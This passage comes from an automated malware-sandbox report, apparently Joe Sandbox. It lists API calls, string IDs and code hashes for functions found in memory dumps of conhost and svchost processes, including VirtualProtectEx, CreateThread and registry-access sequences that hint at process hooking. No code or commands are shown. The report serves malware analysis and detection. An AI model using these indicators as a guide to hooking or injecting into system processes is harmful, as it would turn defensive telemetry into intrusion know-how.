                                                          • Opcode Fuzzy Hash: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                          • Instruction Fuzzy Hash: D9617A73610B449AE7208F65E5403DD7BA0F346B8CF145615EE8D13BAADB38C8AAC701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction ID: 7d9965c5958a57982f8946a5edeae17a06e8b29f21e0d8387158f4eb5ee734e9
                                                          • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction Fuzzy Hash: 61517D32100280D6EB648F35E46439877A2F756B98F144115DFDD87BE9EB38D87ACB02
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction ID: 9d38800803987caae89d804f5a7eabc448c2ca3ce8211e2e8ba6acd2dba4b357
                                                          • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction Fuzzy Hash: D6516232120340E6EB748B35B66439C7E90E757B88F146215DBDE87BE5CB39D86AC702
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                          • Instruction ID: fcc9d5a5d6a5f5c19fb5f22cebab2539d87c4b39c5f1fb1b8c0b793391034ac5
                                                          • Opcode Fuzzy Hash: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                          • Instruction Fuzzy Hash: EC115431328742B1EB609735F9293DA5AA4F746788F9051219ECD837B5EF28CD2EC741
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                          • Instruction ID: 971f88379b0ec2dc479cbb7992210d2b94cc3b39450e9ecc8c27ef34c3018d5d
                                                          • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                          • Instruction Fuzzy Hash: AAD1F132B24A84AAE711CFB9E5502DC37B1F74579CF004216CE9D97BA9DA34C86BC741
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                          • Instruction ID: 0accb524a0873679f9104482d582f2fd253ed9c1c2239512ae5764dd9e4c6d91
                                                          • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                          • Instruction Fuzzy Hash: 68015272520AA0D6D744DFB6F81418A77A0F74AF88F055425DE8D43739EE34C87AC741
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000146F6B12D9B), ref: 00000146F6B12ECC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000146F6B12D9B), ref: 00000146F6B12F57
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorLastMode
                                                          • String ID:
                                                          • API String ID: 953036326-0
                                                          • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                          • Instruction ID: 0e08e12016bd61defbbe8237d6b1d3d71cbfc1cfc9842c1ad5f8a1bff3c12a03
                                                          • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                          • Instruction Fuzzy Hash: E191E132720650A5F7618F75A5A43ED2BE0F706B8CF144119DE8E676A8DB34CCABC702
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                          • Instruction ID: 94f4ee72015eb53d8fcc1b34effccdff0e82b222a7ef4599b68f71d9d22dbede
                                                          • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                          • Instruction Fuzzy Hash: FA113036720F0089EB00CF70F8653E933A4F71A758F441E21DAAD867A4EF78C5A98381
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                          • Instruction ID: daeb79eab9180174dd6cda0250cfe031a1ee960cb524944bd89cdf5d1fd96e1d
                                                          • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                          • Instruction Fuzzy Hash: C471C43622078156E7789E36AB643EA6F90F786788F442116DD8D43BA9DE34CD1EC701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: _log10_special
                                                          • String ID: dll
                                                          • API String ID: 3812965864-1037284150
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: `vector constructor iterator'$ctor closure'
                                                          • API String ID: 592178966-3792692944
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: ctor closure'$destructor iterator'
                                                          • API String ID: 592178966-595914035
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: std::bad_alloc::bad_alloc
                                                          • String ID: `scalar deleting destructor'$rFeaturePresent
                                                          • API String ID: 1875163511-1689945142
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 0000014E41FD3639
                                                          • PathFindFileNameW.SHLWAPI ref: 0000014E41FD3648
                                                            • Part of subcall function 0000014E41FD3C74: StrCmpNIW.KERNELBASE(?,?,?,0000014E41FD254B), ref: 0000014E41FD3C8C
                                                            • Part of subcall function 0000014E41FD3BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000014E41FD365F), ref: 0000014E41FD3BCE
                                                            • Part of subcall function 0000014E41FD3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000014E41FD365F), ref: 0000014E41FD3BFC
                                                            • Part of subcall function 0000014E41FD3BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000014E41FD365F), ref: 0000014E41FD3C1E
                                                            • Part of subcall function 0000014E41FD3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000014E41FD365F), ref: 0000014E41FD3C39
                                                            • Part of subcall function 0000014E41FD3BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000014E41FD365F), ref: 0000014E41FD3C5A
                                                          • CreateThread.KERNELBASE ref: 0000014E41FD368F
                                                            • Part of subcall function 0000014E41FD1D40: GetCurrentThread.KERNEL32 ref: 0000014E41FD1D4B
                                                          Memory Dump Source
                                                          • Source File: 00000045.00000002.3450162698.0000014E41FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                          • Associated: 00000045.00000002.3450007037.0000014E41FD0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000045.00000002.3450405001.0000014E41FE6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000045.00000002.3450622589.0000014E41FF1000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000045.00000002.3450819633.0000014E41FF3000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000045.00000002.3451030485.0000014E41FF9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_69_2_14e41fd0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                          • String ID:
                                                          • API String ID: 1683269324-0

                                                          Control-flow Graph

                                                          Control-flow graph data (rendered graph not captured; legend: Executed / Not Executed). Basic blocks: 18 (14e41fd3c74-14e41fd3c7f), 19 (14e41fd3c99-14e41fd3ca0), 20 (14e41fd3c81-14e41fd3c94, StrCmpNIW), 21 (14e41fd3c96). Edges: 18->19, 18->20, 20->19, 20->21, 21->19.
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000045.00000002.3450162698.0000014E41FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                          • Associated: 00000045.00000002.3450007037.0000014E41FD0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000045.00000002.3450405001.0000014E41FE6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000045.00000002.3450622589.0000014E41FF1000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000045.00000002.3450819633.0000014E41FF3000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000045.00000002.3451030485.0000014E41FF9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_69_2_14e41fd0000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dialer
                                                          • API String ID: 0-3528709123
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000045.00000003.2231913807.0000014E41FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_69_3_14e41fa0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0000014E41FD1628: GetProcessHeap.KERNEL32 ref: 0000014E41FD1633
                                                            • Part of subcall function 0000014E41FD1628: HeapAlloc.KERNEL32 ref: 0000014E41FD1642
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD16B2
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD16DF
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD16F9
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1719
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD1734
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1754
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD176F
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD178F
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD17AA
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD17CA
                                                          • SleepEx.KERNELBASE ref: 0000014E41FD1AE3
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD17E5
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1805
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD1820
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1840
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD185B
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD187B
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD1896
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD18A0
                                                          Memory Dump Source
                                                          • Source File: 00000045.00000002.3450162698.0000014E41FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                          • Associated: 00000045.00000002.3450007037.0000014E41FD0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000045.00000002.3450405001.0000014E41FE6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000045.00000002.3450622589.0000014E41FF1000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000045.00000002.3450819633.0000014E41FF3000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000045.00000002.3451030485.0000014E41FF9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_69_2_14e41fd0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction ID: 0bf38f625baa4da5b2f8a37b5dd4c850af0574279057b7cf903c9f482d4796ef
                                                          • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction Fuzzy Hash: 2331F971718A0182FF509B66DA593FAA3E4BF84BD0F4C51219E4BC76B6EF64C8528370
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000045.00000003.2231913807.0000014E41FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_69_3_14e41fa0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction ID: 0ed9ac66414087d513027ed7df3d5ae234fbd591406b529314a60a7205f700b2
                                                          • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction Fuzzy Hash: 8CE15732704B408AEF609B6594883DDB7E0FB45BC8F1C4115EE8997FAADB38D596C720